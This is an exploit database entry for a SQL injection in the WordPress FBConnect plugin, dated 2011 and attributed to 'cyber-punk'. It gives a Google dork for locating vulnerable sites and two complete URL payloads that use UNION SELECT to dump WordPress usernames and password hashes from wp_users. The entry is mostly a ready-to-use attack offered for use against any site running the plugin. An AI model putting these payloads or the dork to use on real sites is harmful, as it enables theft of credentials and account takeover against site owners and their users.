Wordpress plugin FBConnect SQL-Inj



EKU-ID: 1255 CVE: OSVDB-ID:
Author: cyber-punk Published: 2011-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: Wordpress plugin FBConnect SQL-Inj
# Google Dork: inurl:"fbconnect_action=myhome"
# Date: 03.04.2011
# Author: cyber-punk
# Software Link: http://wordpress.org/
# Version: all, if plugin is on
# GreetZ: 1337day.com Exploit DataBase

http://wordpress-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--

or

http://wp-site/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users--